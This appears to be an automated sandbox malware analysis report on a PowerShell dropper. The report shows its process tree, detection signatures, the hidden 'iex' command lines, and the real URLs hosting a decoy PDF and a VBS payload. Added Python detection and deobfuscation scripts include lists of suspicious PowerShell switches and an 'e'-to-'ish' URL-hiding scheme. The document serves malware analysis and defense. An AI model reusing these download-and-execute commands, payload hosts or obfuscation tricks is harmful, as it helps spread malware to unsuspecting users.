
Windows Analysis Report
KcKtHBkskI.ps1

Overview

General Information

Sample name: KcKtHBkskI.ps1 (renamed because the original name is a hash value)
Original sample name: 7883e31a07c25e30851390471a8d97e172ec6ec1ec98f49813d166f71cb819a1.ps1
Analysis ID: 1578229
MD5: 2ba11b739c9f9a18f60a2ada78e3bc41
SHA1: 48fe4ec641ea47e5fe34cbf27dce776deabce03f
SHA256: 7883e31a07c25e30851390471a8d97e172ec6ec1ec98f49813d166f71cb819a1
Tags: 185-236-228-92, 87-120-112-91, ps1, www-al-rasikh-com, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 8080 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 5084 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7260 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1736,i,1938861957224451301,13168527261703212553,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 2408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7272; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi64_7272.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security

      System Summary

      Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7272, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'", ProcessId: 7476, ProcessName: powershell.exe
      Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7272, TargetFilename: C:\Users\Public\npq.vbs
      Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", ProcessId: 7272, ProcessName: powershell.exe
      Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7272, TargetFilename: C:\Users\Public\npq.vbs
      Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1", ProcessId: 7272, ProcessName: powershell.exe
      Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2408, ProcessName: svchost.exe
      No Suricata rule has matched
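The Sigma matches above reduce to four checks on two kinds of telemetry: the process-creation command lines of the two powershell.exe instances (a hidden window on the child, an unrestricted execution policy on the parent) and the powershell.exe file write of npq.vbs into C:\Users\Public. The Python below is an added illustration written for this page, not part of the Joe Sandbox report and not the Sigma rules themselves: it re-implements simplified versions of those four checks and runs them over constructed Sysmon-style events modelled on this report's process tree and file write. The substring lists, the event field names and the two benign events are assumptions made for the example.

```python
"""Simplified, stand-alone re-implementations of the four Sigma-style checks that
fired on this sample, run over constructed Sysmon-style events (EventID 1 = process
creation, EventID 11 = file create). Illustrative approximations for this page,
not the Sigma rules themselves, which match more fields and more substrings."""
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Hidden-window switches as PowerShell accepts them (parameter names may be abbreviated).
HIDDEN_WINDOW = (" -win hidden", " -w hidden", " -window hidden", " -windowstyle hidden")
# Policy values that disable script-signing enforcement for the session.
INSECURE_POLICY = ("-executionpolicy unrestricted", "-executionpolicy bypass",
                   "-ep unrestricted", "-ep bypass")
# Script and binary extensions a dropper typically writes.
DROPPER_EXT = (".vbs", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd", ".exe", ".dll")
# Locations every user can write to (assumed list for the example).
SUSPICIOUS_DIR = ("c:\\users\\public\\", "c:\\windows\\temp\\", "c:\\perflogs\\")
SHELL_IMAGES = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")


def _image_name(path: str) -> str:
    """Last path component, lower-cased, so matching ignores the install directory."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: Event) -> List[str]:
    """Return the names of the checks this event satisfies (empty list if none)."""
    hits: List[str] = []
    image = _image_name(ev.get("Image", ""))
    if ev.get("EventID") == "1" and image in POWERSHELL:
        # Leading space so " -w hidden" cannot match inside a longer token.
        cl = " " + ev.get("CommandLine", "").lower()
        if any(p in cl for p in HIDDEN_WINDOW):
            hits.append("Suspicious PowerShell Parameter Substring")
        if any(p in cl for p in INSECURE_POLICY):
            hits.append("Change PowerShell Policies to an Insecure Level")
    if ev.get("EventID") == "11" and image in SHELL_IMAGES:
        target = ev.get("TargetFilename", "").lower()
        if target.startswith(SUSPICIOUS_DIR):
            hits.append("Windows Shell/Scripting Application File Write to Suspicious Folder")
        if image in POWERSHELL and target.endswith(DROPPER_EXT):
            hits.append("Potential Binary Or Script Dropper Via PowerShell")
    return hits


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Run every check over every event; return (event index, check name) pairs."""
    return [(i, name) for i, ev in enumerate(events) for name in check_event(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events: the first three mirror the command lines and the npq.vbs
# write in this report; the last two are benign and should produce no hits.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "1", "Image": PS,
     "CommandLine": f'"{PS}" -noLogo -ExecutionPolicy unrestricted -file "C:\\Users\\user\\Desktop\\KcKtHBkskI.ps1"'},
    {"EventID": "1", "Image": PS,
     "CommandLine": f'"{PS}" -win hidden =iex "[Environment]::GetEnvironmentVariable(\'public\') + \'\\\\idj34h.vbs\'"'},
    {"EventID": "11", "Image": PS, "TargetFilename": r"C:\Users\Public\npq.vbs"},
    {"EventID": "1", "Image": PS, "CommandLine": f'"{PS}" -NoProfile -Command Get-Date'},
    {"EventID": "1", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"},
]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The parent process trips only the policy check and the child only the hidden-window check, so a detection that requires both on one command line would miss this sample; correlating on ParentProcessId (7272 in the Sigma data above) is what ties the two together. The benign -NoProfile invocation and the BITS svchost.exe host produce nothing.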


      AV Detection

      Source: KcKtHBkskI.ps1; Avira: detected
      Source: KcKtHBkskI.ps1; ReversingLabs: Detection: 36%
      Source: Submitted Sample; Integrated Neural Analysis Model: matched with 94.6% probability
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.7:49701 version: TLS 1.2
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A01C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: scorlib.pdb_2 source: powershell.exe, 00000000.00000002.1514778693.00000198A01C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1314807939.000001FC4F31E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb] source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb3 source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdbre source: powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: tomation.pdbt source: powershell.exe, 00000000.00000002.1512207597.000001989FDD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbX source: powershell.exe, 00000000.00000002.1431423233.0000019885E42000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dbpdbtem.pdbA source: powershell.exe, 00000000.00000002.1512207597.000001989FDD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32D4X source: powershell.exe, 00000003.00000002.1315883159.000001FC4F59A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbw} source: powershell.exe, 00000000.00000002.1514778693.00000198A0180000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ?/n.pdb source: powershell.exe, 00000003.00000002.1315104951.000001FC4F36D000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
      Source: global traffic; HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1; Host: www.astenterprises.com.pk; Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1; Host: www.bluemaxxlaser.com; Connection: Keep-Alive
      Source: Joe Sandbox View; IP Address: 203.175.174.69
      Source: Joe Sandbox View; IP Address: 107.161.23.150
      Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
      Source: global traffic; DNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global traffic; DNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global traffic; DNS traffic detected: DNS query: x1.i.lencr.org
      Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 19 Dec 2024 11:48:28 GMT; Server: Apache; Content-Length: 315; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: text/html; charset=iso-8859-1; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.1433403188.00000198897A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.12.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.13.dr, qmgr.db.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000000.00000002.1505237210.0000019897D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1505237210.0000019897E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000000.00000002.1433403188.0000019887CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1433403188.00000198897A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.1433403188.000001988983A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1433403188.00000198897DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.1433403188.00000198897DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.1433403188.0000019887EF3000.00000004.00000800.00020000.00000000.sdmp, KcKtHBkskI.ps1String found in binary or memory: http://www.bluishmaxxlasishr.com/ms/ms.vbs
      Source: powershell.exe, 00000003.00000002.1317161256.000001FC4F6A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
      Source: powershell.exe, 00000000.00000002.1514703596.00000198A0020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.12.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000000.00000002.1433403188.0000019887CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC3853D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 0000000D.00000003.1390390863.00000226971A0000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1433403188.00000198888F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1505237210.0000019897D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1505237210.0000019897E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: qmgr.db.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
      Source: ReaderMessages.11.drString found in binary or memory: https://www.adobe.co
      Source: powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1433403188.000001988979F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.p
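Two of the strings above are the fetched URLs with every "e" replaced by the token "ish": http://www.bluishmaxxlasishr.com/ms/ms.vbs (found in KcKtHBkskI.ps1 itself) decodes to http://www.bluemaxxlaser.com/ms/ms.vbs, the URL actually requested, and the astishntishrprisishs.com.pk string decodes to the astenterprises.com.pk PDF URL. The Python below is an added illustration, not code from the sample or from the report: it applies the inverse substitution and pulls the decoded URLs out of a constructed strings dump. That the script reverts the token with a string replace at runtime is an assumption (the replace call is not shown in the report), and the sample blob is constructed from strings listed on this page plus one clean line containing a legitimate "ish".

```python
"""Undo the 'e' -> 'ish' string substitution seen in this sample's URLs.

The URLs the script fetched (www.bluemaxxlaser.com/ms/ms.vbs and
www.astenterprises.com.pk/ms/List%20of%20...) also appear in the .ps1 and in
powershell.exe memory with every 'e' replaced by 'ish'. A static decoder only
needs the inverse substitution; that the script does the same with a runtime
.Replace() is an assumption, the report does not show that call.
"""
import re
from typing import List

TOKEN = "ish"   # replacement token observed in the obfuscated strings
PLAIN = "e"     # character it stands for

URL_RE = re.compile(r"""https?://[^\s"'<>]+""")

# Obfuscated forms copied from the report (the second is truncated there).
OBFUSCATED = (
    "http://www.bluishmaxxlasishr.com/ms/ms.vbs",
    "https://www.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.p",
)


def deobfuscate(s: str) -> str:
    """Inverse substitution: every 'ish' becomes 'e'."""
    return s.replace(TOKEN, PLAIN)


def obfuscate(s: str) -> str:
    """Forward direction, used to confirm the hypothesis against a clear string."""
    return s.replace(PLAIN, TOKEN)


def is_losslessly_encodable(s: str) -> bool:
    """The scheme is only invertible when the clear text never contains the
    token itself: 'publish' decodes to 'puble'. Check this before trusting a
    decoded string that was not already known to be obfuscated."""
    return TOKEN not in s


def recover_urls(memory_blob: str) -> List[str]:
    """URLs that only become visible after decoding, i.e. whose decoded form
    is not literally present in the blob. Clean URLs are left out, which keeps
    legitimate 'ish' text (e.g. 'publish') from producing noise."""
    literal = set(URL_RE.findall(memory_blob))
    decoded = set(URL_RE.findall(deobfuscate(memory_blob)))
    return sorted(decoded - literal)


# Constructed stand-in for a strings dump of the powershell.exe process: clean
# strings the report also lists, one clean line with a legitimate 'ish', and
# the two obfuscated URLs.
SAMPLE_BLOB = "\n".join([
    "https://aka.ms/pscore68",
    "http://nuget.org/NuGet.exe",
    "Get-Content publish.log",
    OBFUSCATED[0],
    "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'",
    OBFUSCATED[1],
])

if __name__ == "__main__":
    for url in recover_urls(SAMPLE_BLOB):
        print(url)
```

Because the scheme is not injective (any legitimate "ish" also turns into "e"), treat decoded strings as leads rather than indicators in their own right; the authoritative IOCs remain the Host headers and DNS queries observed on the wire above, which here agree with the decoded forms.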
      Source: unknown; Network traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49701
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFAAC5A1DC5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00007FFAAC570F5D
      Source: powershell.exe, 00000000.00000002.1433403188.0000019887EF3000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: +nvironmentVariable('public') + '\\idj34h.vbp
      Source: classification engine; Classification label: mal84.evad.winPS1@20/58@4/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\Desktop\List of Required items and services.pdf
      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vhwky43.zfr.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1"
